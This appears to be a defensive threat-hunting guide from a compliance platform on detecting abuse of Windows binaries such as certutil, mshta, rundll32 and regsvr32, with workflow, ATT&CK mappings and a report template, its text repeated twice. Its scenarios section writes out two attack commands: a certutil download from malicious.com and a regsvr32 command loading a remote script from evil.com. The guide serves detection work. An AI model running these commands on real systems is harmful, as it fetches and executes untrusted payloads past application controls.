Hunting for Living-off-the-Land Binaries (LOLBins)

When to Use

When investigating fileless malware campaigns that bypass traditional AV
During proactive threat hunts targeting defense evasion techniques
When EDR alerts fire on legitimate binaries executing unusual child processes
After threat intelligence reports indicate LOLBin abuse in active campaigns
During red team/purple team exercises validating detection coverage for T1218

Prerequisites

Access to EDR telemetry (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne)
SIEM with process creation logs (Sysmon Event ID 1, Windows Security 4688)
Familiarity with LOLBAS Project (lolbas-project.github.io) reference list
PowerShell command-line logging enabled (Module Logging, Script Block Logging)
Network proxy or firewall logs for correlating outbound connections

Workflow

Define Hunt Hypothesis: Formulate a hypothesis based on threat intel (e.g., "Adversaries are using certutil.exe to download second-stage payloads from external domains").
Identify Target LOLBins: Select specific binaries from the LOLBAS Project database to hunt for, prioritizing those matching current threat landscape (certutil, mshta, rundll32, regsvr32, msiexec, wmic, cmstp, bitsadmin).
Collect Process Telemetry: Query EDR or SIEM for process creation events involving target LOLBins with unusual command-line arguments, parent processes, or execution contexts.
Baseline Normal Behavior: Establish what legitimate usage looks like for each LOLBin in your environment by analyzing historical frequency, typical parent processes, and standard arguments.
Identify Anomalies: Compare current telemetry against baselines, flagging executions with network connections, encoded commands, unusual file paths, or abnormal parent-child process chains.
Correlate and Enrich: Cross-reference anomalous LOLBin activity with network logs, DNS queries, file creation events, and threat intelligence feeds.
Document and Report: Record findings, update detection rules, and create IOC lists for identified malicious LOLBin usage.

Key Concepts

Concept	Description
LOLBin	Legitimate OS binary abused by attackers for malicious purposes
LOLBAS Project	Community-curated list of Windows LOLBins, LOLLibs, and LOLScripts
T1218	MITRE ATT&CK - Signed Binary Proxy Execution
T1218.001	Compiled HTML File (mshta.exe)
T1218.002	Control Panel (control.exe)
T1218.003	CMSTP
T1218.005	Mshta
T1218.010	Regsvr32
T1218.011	Rundll32
T1197	BITS Jobs (bitsadmin.exe)
T1140	Deobfuscate/Decode Files (certutil.exe)
Proxy Execution	Using trusted binaries to execute untrusted code
Fileless Attack	Attack that operates primarily in memory without dropping files

Tools & Systems

Tool	Purpose
CrowdStrike Falcon	EDR telemetry and process tree analysis
Microsoft Defender for Endpoint	Advanced hunting with KQL queries
Splunk	SIEM log aggregation and SPL queries
Elastic Security	Detection rules and timeline investigation
Sysmon	Detailed process creation and network logging
LOLBAS Project	Reference database of LOLBin capabilities
Sigma Rules	Generic detection rule format for LOLBins
Velociraptor	Endpoint forensic collection and hunting

Common Scenarios

Certutil Download Cradle: Adversary uses certutil.exe -urlcache -split -f http://malicious.com/payload.exe to download malware, bypassing web proxies that allow certutil traffic.
Mshta HTA Execution: Attacker delivers HTA file via email that executes VBScript payload through mshta.exe, which is a signed Microsoft binary.
Rundll32 DLL Proxy Load: Malicious DLL loaded via rundll32.exe shell32.dll,ShellExec_RunDLL to proxy execution through a trusted binary.
Regsvr32 Squiblydoo: Remote SCT file executed via regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll bypassing application whitelisting.
BITSAdmin Persistence: Adversary creates BITS transfer job to repeatedly download and execute payloads using bitsadmin /transfer.

Output Format

Hunt ID: TH-LOLBIN-[DATE]-[SEQ]
Hypothesis: [Stated hypothesis]
LOLBins Investigated: [List of binaries]
Time Range: [Start] - [End]
Data Sources: [EDR, Sysmon, SIEM]
Findings:
  - [Finding 1 with evidence]
  - [Finding 2 with evidence]
Anomalies Detected: [Count]
True Positives: [Count]
False Positives: [Count]
IOCs Identified: [List]
Detection Rules Created/Updated: [List]
Recommendations: [Next steps]

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC7.2 (Anomaly Detection), CC7.3 (Incident Identification)
ISO 27001: A.12.4 (Logging & Monitoring), A.16.1 (Security Incident Management)
NIST 800-53: SI-4 (System Monitoring), IR-4 (Incident Handling), RA-5 (Vulnerability Scanning)
NIST CSF: DE.AE (Anomalies & Events), DE.CM (Continuous Monitoring), DE.DP (Detection Processes)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add hunting-for-living-off-the-land-binaries

# Or load dynamically via MCP
grc.load_skill("hunting-for-living-off-the-land-binaries")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Hunting for Living-off-the-Land Binaries (LOLBins)

When to Use

When investigating fileless malware campaigns that bypass traditional AV
During proactive threat hunts targeting defense evasion techniques
When EDR alerts fire on legitimate binaries executing unusual child processes
After threat intelligence reports indicate LOLBin abuse in active campaigns
During red team/purple team exercises validating detection coverage for T1218

Prerequisites

Access to EDR telemetry (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne)
SIEM with process creation logs (Sysmon Event ID 1, Windows Security 4688)
Familiarity with LOLBAS Project (lolbas-project.github.io) reference list
PowerShell command-line logging enabled (Module Logging, Script Block Logging)
Network proxy or firewall logs for correlating outbound connections

Workflow

Define Hunt Hypothesis: Formulate a hypothesis based on threat intel (e.g., "Adversaries are using certutil.exe to download second-stage payloads from external domains").
Identify Target LOLBins: Select specific binaries from the LOLBAS Project database to hunt for, prioritizing those matching current threat landscape (certutil, mshta, rundll32, regsvr32, msiexec, wmic, cmstp, bitsadmin).
Collect Process Telemetry: Query EDR or SIEM for process creation events involving target LOLBins with unusual command-line arguments, parent processes, or execution contexts.
Baseline Normal Behavior: Establish what legitimate usage looks like for each LOLBin in your environment by analyzing historical frequency, typical parent processes, and standard arguments.
Identify Anomalies: Compare current telemetry against baselines, flagging executions with network connections, encoded commands, unusual file paths, or abnormal parent-child process chains.
Correlate and Enrich: Cross-reference anomalous LOLBin activity with network logs, DNS queries, file creation events, and threat intelligence feeds.
Document and Report: Record findings, update detection rules, and create IOC lists for identified malicious LOLBin usage.

Key Concepts

Concept	Description
LOLBin	Legitimate OS binary abused by attackers for malicious purposes
LOLBAS Project	Community-curated list of Windows LOLBins, LOLLibs, and LOLScripts
T1218	MITRE ATT&CK - Signed Binary Proxy Execution
T1218.001	Compiled HTML File (mshta.exe)
T1218.002	Control Panel (control.exe)
T1218.003	CMSTP
T1218.005	Mshta
T1218.010	Regsvr32
T1218.011	Rundll32
T1197	BITS Jobs (bitsadmin.exe)
T1140	Deobfuscate/Decode Files (certutil.exe)
Proxy Execution	Using trusted binaries to execute untrusted code
Fileless Attack	Attack that operates primarily in memory without dropping files

Tools & Systems

Tool	Purpose
CrowdStrike Falcon	EDR telemetry and process tree analysis
Microsoft Defender for Endpoint	Advanced hunting with KQL queries
Splunk	SIEM log aggregation and SPL queries
Elastic Security	Detection rules and timeline investigation
Sysmon	Detailed process creation and network logging
LOLBAS Project	Reference database of LOLBin capabilities
Sigma Rules	Generic detection rule format for LOLBins
Velociraptor	Endpoint forensic collection and hunting

Common Scenarios

Certutil Download Cradle: Adversary uses certutil.exe -urlcache -split -f http://malicious.com/payload.exe to download malware, bypassing web proxies that allow certutil traffic.
Mshta HTA Execution: Attacker delivers HTA file via email that executes VBScript payload through mshta.exe, which is a signed Microsoft binary.
Rundll32 DLL Proxy Load: Malicious DLL loaded via rundll32.exe shell32.dll,ShellExec_RunDLL to proxy execution through a trusted binary.
Regsvr32 Squiblydoo: Remote SCT file executed via regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll bypassing application whitelisting.
BITSAdmin Persistence: Adversary creates BITS transfer job to repeatedly download and execute payloads using bitsadmin /transfer.

Output Format

Hunt ID: TH-LOLBIN-[DATE]-[SEQ]
Hypothesis: [Stated hypothesis]
LOLBins Investigated: [List of binaries]
Time Range: [Start] - [End]
Data Sources: [EDR, Sysmon, SIEM]
Findings:
  - [Finding 1 with evidence]
  - [Finding 2 with evidence]
Anomalies Detected: [Count]
True Positives: [Count]
False Positives: [Count]
IOCs Identified: [List]
Detection Rules Created/Updated: [List]
Recommendations: [Next steps]

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC7.2 (Anomaly Detection), CC7.3 (Incident Identification)
ISO 27001: A.12.4 (Logging & Monitoring), A.16.1 (Security Incident Management)
NIST 800-53: SI-4 (System Monitoring), IR-4 (Incident Handling), RA-5 (Vulnerability Scanning)
NIST CSF: DE.AE (Anomalies & Events), DE.CM (Continuous Monitoring), DE.DP (Detection Processes)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add hunting-for-living-off-the-land-binaries

# Or load dynamically via MCP
grc.load_skill("hunting-for-living-off-the-land-binaries")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Prerequisites

MITRE ATT&CK Coverage

Hunting for Living-off-the-Land Binaries (LOLBins)

When to Use

Prerequisites

Workflow

Key Concepts

Tools & Systems

Common Scenarios

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Detecting DLL Sideloading Attacks

Detecting Lateral Movement with Splunk

Detecting Mimikatz Execution Patterns

Detecting Process Hollowing Technique

Hunting for Persistence Mechanisms in Windows

Detecting Credential Dumping with EDR

Prerequisites

MITRE ATT&CK Coverage

Hunting for Living-off-the-Land Binaries (LOLBins)

When to Use

Prerequisites

Workflow

Key Concepts

Tools & Systems

Common Scenarios

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Detecting DLL Sideloading Attacks

Detecting Lateral Movement with Splunk

Detecting Mimikatz Execution Patterns

Detecting Process Hollowing Technique

Hunting for Persistence Mechanisms in Windows

Detecting Credential Dumping with EDR